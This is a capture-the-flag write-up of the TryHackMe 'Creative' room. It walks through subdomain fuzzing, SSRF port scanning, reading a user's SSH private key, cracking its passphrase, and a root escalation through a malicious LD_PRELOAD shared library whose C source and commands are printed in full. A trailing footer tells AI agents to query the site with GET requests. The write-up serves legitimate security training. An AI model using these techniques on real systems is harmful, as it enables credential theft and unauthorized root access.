# Creative

{% embed url="<https://tryhackme.com/r/room/creative>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

The Nmap scan reveals only two ports: port 22, on which we have SSH, and port 80, a web server with nginx 1.18.0.

<figure><img src="/files/HrEUwxg8vhGYRduqvBeL" alt=""><figcaption></figcaption></figure>

Unfortunately, the Gobuster scan did not find anything interesting on the web server.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ gobuster dir -u http://creative.thm -w /usr/share/wordlists/dirb/big.txt 
```

Even a manual enumeration did not produce any useful results.

<figure><img src="/files/kGLoasJnSemOtz93hJYK" alt=""><figcaption></figcaption></figure>

We have just a page with static links and some links leading to `.html` sites.

<figure><img src="/files/uYS30Mv5zesB0HXdO3pc" alt=""><figcaption></figcaption></figure>

Time to enumerate some subdomains; hopefully we chose the right domain with `creative.thm`.\
We find the subdomain `beta.creative.thm`.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://creative.thm/ -H "Host:FUZZ.creative.thm" -fw 6
```

<figure><img src="/files/hHVhEWWWw8o8F4T5xeHv" alt=""><figcaption></figcaption></figure>

Here we face a beta URL tester, which tests if an entered URL is alive or dead; if it is alive, we get redirected to the page. This is begging for SSRF.

<figure><img src="/files/isT2Rgrz5E198zifXlCa" alt=""><figcaption></figcaption></figure>

But, we try the usual suspects first, like file inclusion, or command injection, since we are not aware of any restricted resource.

<figure><img src="/files/8tYXiAxvIqljuvAqXHd6" alt=""><figcaption></figcaption></figure>

It seems like there is nothing to find and have to dig deeper making use of SSRF.

<figure><img src="/files/UqeuxGg0kiAavhpr7zdz" alt=""><figcaption></figcaption></figure>

## Shell as saad

Here are some scans tried before using the automatic SSRF fuzzer. We did not face any restricted resources, so command injection or LFI was the first thing that came to mind.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ ffuf -w /usr/share/wordlists/SecLists/Fuzzing/command-injection-commix.txt -u http://beta.creative.thm/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=FUZZ" -fw 3
```

```
SecLists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt
```

```
SecLists/Fuzzing/LFI/LFI-Jhaddix.txt
```

But it is much simpler. With SSRF, we could also reach out to some internal ports; maybe there is a web server running internally containing sensitive information. To probe that, we could use Ffuf or any other fuzzer or SSRFmap. We'll do it with SSRFmap.

{% embed url="<https://github.com/swisskyrepo/SSRFmap>" %}

To keep it simple, we capture a request from an arbitrary URL submission and save it to `request.txt`.

<figure><img src="/files/mKtCJ91Z97XNUiffWc6C" alt=""><figcaption></figcaption></figure>

After having the repo cloned and installing the requirements, we run the following command to check for internal ports using the module `portscan`:

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative/SSRFmap]
└─$ python3 ssrfmap.py -r request.txt -p url -m portscan
```

<figure><img src="/files/Ot3zRUdB46LgMgYor9er" alt=""><figcaption></figcaption></figure>

After a short duration, we find port `1337` to be open internally.

<figure><img src="/files/PideqhlM6BqCM5ICpomf" alt=""><figcaption></figcaption></figure>

We can also use Ffuf instead of installing another tool. We would only have to generate a port list using `seq`. After a very short time, we get port `1337`. The scan hangs briefly on port `5000`, as `beta.creative.thm` is located on this internally, and the recursive call probably causes a short delay. After a little while, the scan continues.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ seq 65535 > ports.txt
```

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ ffuf -w ports.txt -u http://beta.creative.thm/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://127.0.0.1:FUZZ" -fw 3
```

<figure><img src="/files/rSklL0gSFnr9y82c5haA" alt=""><figcaption></figcaption></figure>

Requesting the endpoint on `1337`...

```
http://127.0.0.1:1337/
```

<figure><img src="/files/W7qNVPxlYTEvAgt3sXOL" alt=""><figcaption></figcaption></figure>

... we face a directory lisiting of a `root` folder.

<figure><img src="/files/ROzeYlo0t8V4GFz4NArU" alt=""><figcaption></figcaption></figure>

We make a request to the home directory...

```
http://127.0.0.1:1337/home/
```

<figure><img src="/files/ZZFUB9UIcM6pweSJJCqd" alt=""><figcaption></figcaption></figure>

...And find the directory of user `saad`.

<figure><img src="/files/OeSd1g1HehB1PLzavkfG" alt=""><figcaption></figcaption></figure>

After having the home directory enumerated file by file, we find the users' flag and the private SSH key of `saad` in the `.ssh` folder.

```
http://127.0.0.1:1337/home/saad/.ssh/id_rsa
```

<figure><img src="/files/9HD7plzPpaZ3k0v2hpZi" alt=""><figcaption></figcaption></figure>

We request the key, and view the page source to save the contents properly.

<figure><img src="/files/6PCzk7RMV2cDY6GprEiw" alt=""><figcaption></figcaption></figure>

After having saved the key and changed to the correct permission, we try to log in via SSH as `saad`, but we have to enter a passphrase for the SSH key.

<figure><img src="/files/u5Djowa42rjBxOKZi0tk" alt=""><figcaption></figcaption></figure>

We pass the key into `ssh2john` to generate a crackable hash for John.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ ssh2john id_rsa > id_rsa.hash  
```

<figure><img src="/files/vo11oTn1VR6c0Gx5FYQ5" alt=""><figcaption></figcaption></figure>

Next, we crack the hash using John with `rockyou.txt`, and get the passphrase for the key.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/creative]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt 
```

<figure><img src="/files/Bv26V8q33uHo0FWlNRxG" alt=""><figcaption></figcaption></figure>

With the passphrase, we are able to log in and are the user `saad`. In the user's home directory, we find the first flag, which was already accessible via the `beta.creative.thm`.

<figure><img src="/files/7qhlqOHPY6DTeVYv32rL" alt=""><figcaption></figcaption></figure>

## Shell as root

Enumerating the user's home directory, we find a `.bash_history` with content. This holds the credentials for the user `saad`.

<figure><img src="/files/r1VDeHqCN2iZUYUzDGmd" alt=""><figcaption></figcaption></figure>

With those credentials, we are able to query `sudo -l`. We are able to run `/usr/bin/ping` with sudo permissions, which is not really useful on its own; we are not able to escalate our privileges only with that. But there is another option present `env_keep+=LD_PRELOAD.`\
\
`LD_PRELOAD` is an environment variable used on Unix-like operating systems to load additional dynamic libraries before all others when a program is run. This can be used to override functions in other shared libraries.

If an attacker can set `LD_PRELOAD` to point to a malicious shared library, and this environment variable is preserved when running commands with `sudo`, it allows the attacker to execute arbitrary code with elevated privileges.

<figure><img src="/files/wzFUOLELJN8RAPyg4bS6" alt=""><figcaption></figcaption></figure>

We make use of the following resource, which provides us with a previously mentioned shared library written in `C`. This library includes a function that escalates privileges to root by setting the user and group IDs to zero and launching a shell, effectively granting root shell access to the user.

{% embed url="<https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/>" %}

{% code title="shell.c" lineNumbers="true" %}

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
```

{% endcode %}

We compile the `C` code into a shared library.

```bash
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
```

Next, we execute the `ping` as sudo and set `LD_PRELOAD` to the previously crafted shared library. We get a root shell and are able to extract the root flag at `/root`.

```bash
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
```

<figure><img src="/files/zZTNQqwhIbjfMxo4mtSR" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/creative.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.